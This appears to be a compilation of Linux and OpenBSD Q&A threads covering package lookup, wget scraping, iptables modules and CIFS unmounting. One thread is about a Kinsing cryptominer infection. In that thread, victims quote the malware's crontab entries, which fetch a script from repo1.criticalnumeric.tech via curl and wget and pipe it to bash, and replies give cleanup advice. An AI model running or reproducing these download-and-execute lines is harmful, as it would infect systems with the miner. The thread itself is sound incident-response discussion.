OpenBSD pkg_info not finding package?

I can see that the UniFi port is present in this ports list. However, running pkg_info -Q unifi yields no results.
How do I determine why this is occurring?
I tested with pkg_info -Q unzip and it responds fine:
system# whoami
root
system# pkg_info -Q unifi
system# pkg_info -Q unzip
unzip-6.0p14
unzip-6.0p14-iconv
system#

Just learned that some ports (like UniFi) are not distributed as pre-built packages. To add these, the ports tree needs to be set up so the port can be built from source.
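For anyone landing here, a rough sketch of that setup following the OpenBSD FAQ (the mirror URL is the usual CDN; the port's category isn't shown in the ports list, so search for it first):

cd /tmp
ftp "https://cdn.openbsd.org/pub/OpenBSD/$(uname -r)/ports.tar.gz"   # verify the signature in practice
cd /usr && tar xzf /tmp/ports.tar.gz                                 # unpacks the tree under /usr/ports

cd /usr/ports
make search key=unifi                    # reports the port's directory
cd /usr/ports/<category>/unifi           # <category> is a placeholder from the search output
make install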

Related

Does somebody know about this: repo1.criticalnumeric.tech?

I found that in the company server there is a crontab that runs with this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird; none of our engineers added this to the crontab, which makes me think it could be an attack.
Any thoughts?
If your server hosts a web application built with the Laravel framework and its debug mode is turned on, you are probably suffering from a recent RCE (Remote Code Execution) exploit.
Blogpost about technical details of the bug: https://www.ambionics.io/blog/laravel-debug-rce
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-3129
My professional recommendation: never run your application with debug mode enabled in production.
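For Laravel specifically, debug mode comes from the application's .env file, so the fix is a one-line change on the production host (a sketch, using the standard Laravel configuration keys):

# .env on the production server
APP_ENV=production
APP_DEBUG=false

# if the config is cached, rebuild it so the change takes effect
php artisan config:cache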
The Kinsing malware is responsible for this attack; it takes control of the crontab to keep the server infected. I have had experience with this attack, and for me the only way to clean the server was to back up all the important data and reinstall from zero. I followed all the recipes and nothing worked to stop it. The most important thing with this attack is to change the permissions on the crontab file so the malware cannot overwrite it.
Another important thing is to check the permissions of the infected user's .ssh directory, because the malware changes them and that prevents logging in with SSH keys; you must restore the permissions to their original state to regain access.
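As a sketch, the usual restore looks like this (the account name and home directory are placeholders; adjust to the infected user):

chattr -R -i /home/victim/.ssh 2>/dev/null    # clear the immutable flag in case the malware set it
chown -R victim:victim /home/victim/.ssh
chmod 700 /home/victim/.ssh
chmod 600 /home/victim/.ssh/authorized_keys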
Search for the kdevtmpfsi executable, which sits somewhere under /var/tmp; delete it and create a dummy file with the same name with permissions set to 000. This is not the cure, but it buys time for the backup.
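A sketch of that stop-gap, assuming the binary sits directly under /var/tmp (search first, since the path varies):

find /tmp /var/tmp -name 'kdevtmpfsi*' 2>/dev/null   # locate the miner
pkill -9 -f kdevtmpfsi                               # stop the running copy
rm -f /var/tmp/kdevtmpfsi
touch /var/tmp/kdevtmpfsi                            # dummy placeholder...
chmod 000 /var/tmp/kdevtmpfsi                        # ...that nothing can execute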
I think it is related to the issue in the link below. I saw similar entries in the output of a ps aux command on one of our servers. If you are unlucky, you will find kdevtmpfsi hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner
We had the same attack on Sat, Feb 13. I changed the permissions on the crontab directory to rwx for root only. Before that we killed all www-data processes with "killall -u www-data -9"; so far no other instance of the offending process... will keep monitoring. We also disabled curl because we didn't need it.
I'm having the same problem on a Debian 10 server.
I checked with htop and found these:
curl -kL http://repo1.criticalnumeric.tech/scripts/cnc/install?time=1613422342
and
bash /tmp/.ssh-www-data/kswapd4
Both ran under the www-data user, and they were consuming all available resources (CPU and memory).
I also found something strange in www-data's cron:
root#***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
#reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
https://pastebin.com/Q049ZZtW
I think I have to reinstall Debian 10 on my server... or is there a way to clean it?

wget recursion and file extraction

I'm trying to use wget to elegantly & politely download all the pdfs from a website. The pdfs live in various sub-directories under the starting URL. It appears that the -A pdf option is conflicting with the -r option. But I'm not a wget expert! This command:
wget -nd -np -r site/path
faithfully traverses the entire site downloading everything downstream of path (not polite!). This command:
wget -nd -np -r -A pdf site/path
finishes immediately having downloaded nothing. Running that same command in debug mode:
wget -nd -np -r -A pdf -d site/path
reveals that the sub-directories are ignored with the debug message:
Deciding whether to enqueue "https://site/path/subdir1". https://site/path/subdir1 (subdir1) does not match acc/rej rules. Decided NOT to load it.
I think this means that the sub directories did not satisfy the "pdf" filter and were excluded. Is there a way to get wget to recurse into sub directories (of random depth) and only download pdfs (into a single local dir)? Or does wget need to download everything and then I need to manually filter for pdfs afterward?
UPDATE: thanks to everyone for their ideas. The solution was to use a two step approach including a modified version of this: http://mindspill.net/computing/linux-notes/generate-list-of-urls-using-wget/
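For anyone wanting the shape of that two-step approach, a rough sketch (GNU wget flags; the grep pattern assumes absolute https URLs in the spider log):

# step 1: spider the site and collect every PDF URL wget encounters
wget -r -np --spider https://site/path 2>&1 | grep -o 'https://[^ ]*\.pdf' | sort -u > pdflinks.txt
# step 2: download just those files into one flat directory
wget -nd -P pdfs/ -i pdflinks.txt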
Try this:
The -l switch tells wget how many levels down from the primary URL to follow; -l1 means one level. You can obviously change that to however many levels of links you want to follow.
wget -r -l1 -A.pdf http://www.example.com/page-with-pdfs.htm
refer man wget for more details
If the above doesn't work, try this:
First verify that the TOS of the web site permit crawling it. Then one solution is:
mech-dump --links 'http://example.com' |
grep 'pdf$' |
sed -E 's/\s+/%20/g' |
xargs -I% wget 'http://example.com/%'
The mech-dump command comes with Perl's WWW::Mechanize module (the libwww-mechanize-perl package on Debian and Debian-like distros).
To install mech-dump:
sudo apt-get update -y
sudo apt-get install -y libwww-mechanize-perl
github repo https://github.com/libwww-perl/WWW-Mechanize
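One caveat with the pipeline above: mech-dump prints links exactly as they appear in the page, so relative hrefs would break the final wget step. If I remember correctly, mech-dump also takes an --absolute flag that resolves links first, which would simplify the pipeline to:

mech-dump --absolute --links 'http://example.com' | grep 'pdf$' | xargs -n1 wget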
I haven't tested this, but you can still give it a try. I think you still need to find a way to get all the URLs of the website and pipe them into one of the solutions I have given.
You will need to have wget and lynx installed:
sudo apt-get install wget lynx
Prepare a script; name it however you want. For this example, call it pdflinkextractor:
#!/bin/bash
# usage: ./pdflinkextractor <url>
WEBSITE="$1"
echo "Getting link list..."
# lynx prints one numbered link per line; awk keeps the URL column
lynx -cache=0 -dump -listonly "$WEBSITE" | grep '\.pdf$' | awk '{print $2}' | tee pdflinks.txt
echo "Downloading..."
wget -P pdflinkextractor_files/ -i pdflinks.txt
To run the file, make it executable first:
chmod 700 pdflinkextractor
$ ./pdflinkextractor http://www.pdfscripting.com/public/Free-Sample-PDF-Files-with-scripts.cfm

Unable to run nw.js application in ubuntu

I created a node-webkit hello-world application based on the tutorial given in this link, and tried to run it on Ubuntu using the command given in this link. But when I run the command nw /home/myUsername/Documents/myNodeWebkitApps/helloWorld/myApp.nw it prints the following in the terminal:
usage
nw [udp] <options> <host> <port>
Default TCP protocol can be changed to UDP by ``udp'' argument.
UDP options
currently none
TCP options
-f firewall mode, connection is initiated by netread.
Host specification is ignored and can be omited.
-c ignored. Transmission checksum is activated by
default.
-C algorithm use the specified algorithm for checksum. This
option also implies -c.
Supported algorithms (the first is default):
md5 none
general options
-i <file> read data from file instead of stdin.
-b print speed in b/s instead of B/s
-h <n> print `#' after each n KiB transferred (def. 10485.76).
-H <n> print `#' after each n MiB transferred (def. 10.24).
-q be quiet.
-v be verbose.
-vv be very verbose.
-V show version.
-vV show verbose version.
return values
0 no errors.
1 some error occured.
2 checksum validation failed.
How can I run the application as described in the first link?
The output here did not come from nw.js but from netrw, which is also installed on your machine and provides its own nw command. You can fix it by removing netrw from your machine or by invoking nw.js through its full path.
Finally, I managed to run the hello-world application with the help of this link and this Stack Overflow answer, like so:
Install nw-builder with the command npm install nw-builder -g
If you get an error like /usr/bin/env: node: No such file or directory, then, as given in the second link above, symlink node with ln -s /usr/bin/nodejs /usr/bin/node
Now we can run our application by the command nwbuild -r ~/Desktop/webkit-example
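For context, the hello-world app being built is just a folder containing a manifest and a page; a minimal sketch (the two required package.json fields, "name" and "main", are per the nw.js docs; the rest is illustrative):

mkdir -p ~/Desktop/webkit-example
cat > ~/Desktop/webkit-example/package.json <<'EOF'
{
  "name": "helloworld",
  "main": "index.html"
}
EOF
cat > ~/Desktop/webkit-example/index.html <<'EOF'
<!DOCTYPE html><html><body><h1>Hello World!</h1></body></html>
EOF
nwbuild -r ~/Desktop/webkit-example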

List of loaded iptables modules

Is there any convenient way to show the list of loaded iptables modules? I can show installed modules by listing the /lib/iptables/ (or /lib64/iptables/) directory, but I need the list of active modules.
Loaded iptables modules can be found in /proc/net/ip_tables_matches proc filesystem entry.
cat /proc/net/ip_tables_matches
In PHP I can access the loaded iptables modules by reading the file and splitting its contents:
$content = file_get_contents('/proc/net/ip_tables_matches');
$modules = explode("\n", $content);
Of course this requires the proc filesystem to be mounted (most GNU/Linux distros mount it by default).
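Alongside ip_tables_matches, the kernel exposes sibling proc entries for targets and tables; a quick way to dump all three (entry names as found on stock kernels with ip_tables loaded):

for f in matches targets names; do
    echo "== ip_tables_$f =="
    cat "/proc/net/ip_tables_$f"
done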
This is a really old post but here we go:
# lsmod | grep ip
shows a list of loaded modules, most of which I think are related to iptables...
/proc/net/ip_tables_matches doesn't show modules (at least not in RHEL 6)
Take a look in the following directory (replace per your kernel version):
ls /lib/modules/2.6.32-504.8.1.el6.x86_64/kernel/net/netfilter/
You can load a module using modprobe (dropping the .ko suffix shown in the directory listing):
modprobe nf_conntrack_ftp
Alternatively, you can ensure it's loaded at boot by adding it to:
/etc/sysconfig/iptables-config (RHEL/CENTOS)
IPTABLES_MODULES="nf_conntrack_ftp"
This seems to be poorly documented.
Try this for a fast overview of the netfilter modules present on your system; here is a one-liner for pasting:
for i in /lib/modules/$(uname -r)/kernel/net/netfilter/*; do echo -e "\e[33;1m$(basename "$i")\e[0m"; strings "$i" | \grep -e description -e depends| sed -e 's/Xtables: //g' -e 's/=/: /g' -e 's/depends=/depends on: /g'; echo; done
Again for readability, with added newlines:
#!/bin/bash
for i in /lib/modules/$(uname -r)/kernel/net/netfilter/*
do
    echo -e "\e[33;1m$(basename "$i")\e[0m"
    strings "$i" | \grep -e description -e depends | sed -e 's/Xtables: //g' -e 's/=/: /g' -e 's/depends=/depends on: /g'
    echo
done
The filename will appear in yellow, from which you can guess whether the module in question exists. The description and dependencies are on the two lines below it.
This will not cover everything (because that would be too easy, of course). Only looking the modules up manually tells you with 100% accuracy whether they exist:
iptables -m <match/module name> --help
If a module exists on your system, at the end of the help text you will get some info on how to use it:
ctr-014# iptables -m limit --help
iptables v1.4.14
Usage: iptables -[ACD] chain rule-specification [options]
iptables -I chain [rulenum] rule-specification [options]
...
[!] --version -V print package version.
limit match options:
--limit avg max average match rate: default 3/hour
[Packets per second unless followed by
/sec /minute /hour /day postfixes]
--limit-burst number number to match in a burst, default 5
ctr-014#
If the module is not present on your system:
ctr-014# iptables -m iplimit --help
iptables v1.4.14: Couldn't load match `iplimit':No such file or directory
Try `iptables -h' or 'iptables --help' for more information.
ctr-014#
As Gonio has suggested, lsmod lists all loaded kernel modules, but grepping for "ip" won't give you all iptables modules.
I would rather use
lsmod|grep -E "nf_|xt_|ip"
and still, I'm not sure the list will be complete.
As an alternative method, this can also be done with a Python script.
First make sure you have the iptc library.
sudo pip install --upgrade python-iptables
(Assuming Python3 is your version)
import iptc

table = iptc.Table(iptc.Table.FILTER)
for chain in table.chains:
    print("------------------------------------------")
    print("Chain ", chain.name)
    for rule in chain.rules:
        print("Rule ", "proto", rule.protocol, "src:", rule.src, "dst:", rule.dst, "in:", rule.in_interface, "out:", rule.out_interface)
        print("Matches:")
        for match in rule.matches:
            print(match.name)
        print("Target:")
        print(rule.target.name)
print("------------------------------------------")

How do you force a CIFS connection to unmount

I have a CIFS share mounted on a Linux machine. The CIFS server is down, or the internet connection is down, and anything that touches the CIFS mount now takes several minutes to timeout, and is unkillable while you wait. I can't even run ls in my home directory because there is a symlink pointing inside the CIFS mount and ls tries to follow it to decide what color it should be. If I try to umount it (even with -fl), the umount process hangs just like ls does. Not even sudo kill -9 can kill it. How can I force the kernel to unmount?
I use lazy unmount: umount -l (that's a lowercase L)
Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)
umount -a -t cifs -l
worked like a charm for me on CentOS 6.3. It saved me a server reboot.
On RHEL 6 this worked:
umount -f -a -t cifs -l
This works for me (Ubuntu 13.10 Desktop to an Ubuntu 14.04 Server):
sudo umount -f /mnt/my_share
Mounted with
sudo mount -t cifs -o username=me,password=mine //192.168.0.111/serv_share /mnt/my_share
where serv_share is the share set up and pointed to in the smb.conf file.
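For reference, the server-side piece referred to above would look roughly like this in smb.conf (path and options are placeholders):

[serv_share]
    path = /srv/serv_share
    read only = no
    valid users = me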
I had this issue for a day until I found the real resolution: instead of trying to force-unmount an SMB share that is hung, mount the share with the "soft" option. If a process attempts to access the share while it is unavailable, it will stop trying after a certain amount of time.
soft Make the mount soft. Fail file system calls after a number of seconds.
mount -t smbfs -o soft //username#server/share /users/username/smb/share
stat /users/username/smb/share/file
stat: /users/username/smb/share/file: stat: Operation timed out
This may not be a real answer to your question, but it is a solution to the problem.
There's a -f option to umount that you can try:
umount -f /mnt/fileshare
Are you specifying the '-t cifs' option to mount? Also make sure you're not specifying the 'hard' option to mount.
You may also want to consider fusesmb, since the filesystem will be running in userspace you can kill it just like any other process.
Try umount -f /mnt/share. Works OK with NFS; never tried it with CIFS.
Also, take a look at autofs: it will mount the share only when accessed, and unmount it afterwards.
There is a good tutorial at www.howtoforge.net
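A minimal autofs sketch for a CIFS share (map file name, mount point, timeout, and credentials path are all assumptions; syntax per the auto.master man page):

# /etc/auto.master: mounts live under /mnt/auto, unmounted after 60s idle
/mnt/auto /etc/auto.cifs --timeout=60

# /etc/auto.cifs: key, mount options, then the share prefixed with ":"
serv_share -fstype=cifs,credentials=/etc/smb.cred ://192.168.0.111/serv_share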
I had a very similar problem with davfs. In the man page of umount.davfs, I found that the -f -l -n -r -v options are ignored by umount.davfs. To force-unmount my davfs mount, I had to use umount -i -f -l /media/davmount.
umount -f -t cifs -l /mnt &
Be careful with the &: it lets umount run in the background.
umount will detach the filesystem first, so you will find nothing under /mnt. If you then run a df command, it will finish unmounting /mnt forcibly.
Approaching this problem sideways:
If you can't unmount because the filesystem is busy, is your ssh/terminal session cd'd into the mount directory, therefore making the filesystem busy?
For me, the solution was to cd into my home, then sudo umount worked flawlessly.
cd ~
umount /path/to/my/share
I would post this as a comment, but I have insufficient reputation. Hoping to spare someone else the forehead slap.
I experienced very different results regarding unmounting a dead cifs mount and found several tricks to bypass the problem temporarily.
Let's start with the mountpoint command. It can be useful to analyze the status of a mount:
mountpoint /mnt/smb_share
Usually it returns "is a mountpoint" or "is not a mountpoint".
But it can even return:
No such device
Transport endpoint is not connected
<nothing / stale>
For every result except "is not a mountpoint" there is a chance of unmounting.
You could try the usual way:
umount /mnt/smb_share
or force mode:
umount /mnt/smb_share -f
But often force does not help; it simply returns the same nasty "device is busy" message.
Then the only option is to use the lazy mode:
umount /mnt/smb_share -l
BUT: This does not unmount anything. It only "moves" the mount to the root of the system, which can be seen as follows:
# lsof | grep mount | grep cwd
mount.cif 3125 root cwd unknown / (stat: No such device)
mount.cif 3150 root cwd unknown / (stat: No such device)
It is even noted in the documentation:
Lazy unmount. Detach the filesystem from the file hierarchy
now, and clean up all references to this filesystem as soon
as it is not busy anymore.
Now if you are unlucky, it will stay there forever. Even killing the process probably does not help:
kill -9 $pid
But why is this a problem? Because mount /mnt/smb_share does not work again until the lazily unmounted path has actually been cleaned up by the Linux kernel. This is even mentioned in the documentation of umount: "lazy" should only be used to avoid long shutdown/reboot hangs:
A system reboot would be expected in near future if you’re
going to use this option for network filesystem or local
filesystem with submounts. The recommended use-case for
umount -l is to prevent hangs on shutdown due to an
unreachable network share where a normal umount will hang due
to a downed server or a network partition. Remounts of the
share will not be possible.
Workarounds
Use a different SMB version
If you still have hope that the lazily unmounted path will eventually become not busy and be cleaned up by the Linux kernel, or you can't reboot at the moment, then you may be lucky: your SMB server may support several protocol versions, and we can use the following trick.
Let's say you mounted your share as follows:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw
With that, Linux automatically negotiates the highest supported SMB protocol version, say 3.1. If you now force that same version explicitly, it won't mount, as expected:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw,vers=3.1
But then simply try a different version:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw,vers=3.0
or maybe 2.1:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw,vers=2.1
Change the IP of the SMB server
If you are able to change the IP address of your SMB server, or add a second IP to it, you can use that to mount the same server again.
Dirty: Forward the traffic
Let's say the SMB server has the IP address 10.0.0.1 and the mount is really dead. Then create this iptables rule:
iptables -t nat -A OUTPUT -d 10.0.0.250 -j DNAT --to-destination 10.0.0.1
Now change your mount command accordingly, so it mounts the Samba server through IP 10.0.0.250 instead of 10.0.0.1, and voilà, it's mounted without a server reboot. Dirty, but it works. PS: this rule does not survive a reboot, so you should mount the SMB server manually and leave /etc/fstab as usual.
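So with the rule above in place, the fresh mount goes through the stand-in address:

mount.cifs //10.0.0.250/share /mnt/smb_share -o username=smb_user,password=smb_pw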
More debugging
If you want to check whether the Samba connection itself works in principle, you can try to list all SMB shares of the server through SMB3 as follows:
smbclient -L //smb.server -U "smb_user" -m SMB3
or view the content of a share with SMB1:
smbclient //smb.server/share -U "smb_user" -m NT1 -c ls
On RHEL 6 this worked for me also:
umount -f -a -t cifs -l FOLDER_NAME
A lazy unmount will do the job for you.
umount -l <mount path>
